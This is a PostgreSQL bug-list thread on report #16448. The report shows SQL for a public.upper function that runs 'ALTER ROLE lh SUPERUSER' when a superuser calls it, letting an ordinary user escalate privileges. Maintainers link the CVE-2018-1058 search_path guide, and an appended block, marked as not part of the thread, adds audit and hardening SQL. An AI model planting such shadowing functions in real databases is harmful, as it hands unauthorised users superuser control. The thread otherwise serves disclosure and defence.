Discussion: BUG #16448: Remote code execution vulnerability

BUG #16448: Remote code execution vulnerability

From
PG Bug reporting form
Date:
The following bug has been logged on the website:

Bug reference:      16448
Logged by:          yi Ding
Email address:      abcxiaod@126.com
PostgreSQL version: 10.12
Operating system:   linux
Description:

A common user created a function in the public space and added some
malicious codes in the function, when other users with superuser rights call
this function, the malicious code will be executed, so as to achieve the
purpose of remote malicious code execution.

   First, Non-superuser lh defines a function named upper, which contains
the statement to modify user permissions.
SQL:
CREATE TABLE public.testlh AS SELECT 'lh'::varchar AS contents;
CREATE FUNCTION public.upper(varchar) RETURNS TEXT AS $$
ALTER ROLE lh SUPERUSER;
SELECT pg_catalog.upper($1);
$$ LANGUAGE SQL VOLATILE;
 
Second, Superuser pg01 will execute the above statement after calling the
upper function, which will change user lh to a super user.


Re: BUG #16448: Remote code execution vulnerability

From
Heikki Linnakangas
Date:
On 18/05/2020 12:14, PG Bug reporting form wrote:
> The following bug has been logged on the website:
> 
> Bug reference:      16448
> Logged by:          yi Ding
> Email address:      abcxiaod@126.com
> PostgreSQL version: 10.12
> Operating system:   linux
> Description:
> 
> A common user created a function in the public space and added some
> malicious codes in the function, when other users with superuser rights call
> this function, the malicious code will be executed, so as to achieve the
> purpose of remote malicious code execution.
> 
>     First, Non-superuser lh defines a function named upper, which contains
> the statement to modify user permissions.
> SQL:
> CREATE TABLE public.testlh AS SELECT 'lh'::varchar AS contents;
> CREATE FUNCTION public.upper(varchar) RETURNS TEXT AS $$
> ALTER ROLE lh SUPERUSER;
> SELECT pg_catalog.upper($1);
> $$ LANGUAGE SQL VOLATILE;
>   
> Second, Superuser pg01 will execute the above statement after calling the
> upper function, which will change user lh to a super user.

See 
https://wiki.postgresql.org/wiki/A_Guide_to_CVE-2018-1058%3A_Protect_Your_Search_Path

- Heikki
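
Added example, not part of the thread: one way a superuser could audit a database for the function shadowing described in the report and apply the two settings the linked guide recommends. The role name pg01 is taken from the report; the audit query itself is an assumption about how to check for the condition, not text from the guide.

```sql
-- Added example (not from the thread). Run as a superuser, once per database.

-- Resolve unqualified names against pg_catalog only for this session,
-- so the audit itself cannot pick up a shadowing object.
SELECT pg_catalog.set_config('search_path', '', false);

-- 1. Audit: functions outside the system schemas that share a name with a
--    pg_catalog function and are owned by a role without SUPERUSER.
--    public.upper(varchar) from the report would appear here.
SELECT n.nspname AS schema_name,
       p.proname AS function_name,
       pg_catalog.pg_get_function_identity_arguments(p.oid) AS arguments,
       r.rolname AS owner
FROM pg_catalog.pg_proc p
JOIN pg_catalog.pg_namespace n ON n.oid = p.pronamespace
JOIN pg_catalog.pg_roles r ON r.oid = p.proowner
WHERE n.nspname NOT IN ('pg_catalog', 'information_schema')
  AND NOT r.rolsuper
  AND EXISTS (SELECT 1
              FROM pg_catalog.pg_proc c
              WHERE c.pronamespace = 'pg_catalog'::pg_catalog.regnamespace
                AND c.proname = p.proname)
ORDER BY schema_name, function_name;

-- 2. Check whether every role may still create objects in schema public.
SELECT pg_catalog.has_schema_privilege('public', 'public', 'CREATE')
       AS public_can_create;

-- 3. Hardening: stop ordinary roles from creating objects in public ...
REVOKE CREATE ON SCHEMA public FROM PUBLIC;

-- ... and keep public out of the privileged role's default search path.
ALTER ROLE pg01 SET search_path = "$user";
```

The REVOKE does not remove objects that already exist, so rows returned by the audit query still need to be reviewed and dropped or re-owned.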



Re: BUG #16448: Remote code execution vulnerability

From
"David G. Johnston"
Date:
On Mon, May 18, 2020 at 2:41 AM PG Bug reporting form <noreply@postgresql.org> wrote:
> The following bug has been logged on the website:
>
> Bug reference:      16448
> Logged by:          yi Ding
> Email address:      abcxiaod@126.com
> PostgreSQL version: 10.12
> Operating system:   linux
> Description:
>
> A common user created a function in the public space and added some
> malicious codes in the function, when other users with superuser rights call
> this function, the malicious code will be executed, so as to achieve the
> purpose of remote malicious code execution.

The project respectfully requests that security related concerns be reported to the security list as opposed to the public bug report listing.



David J.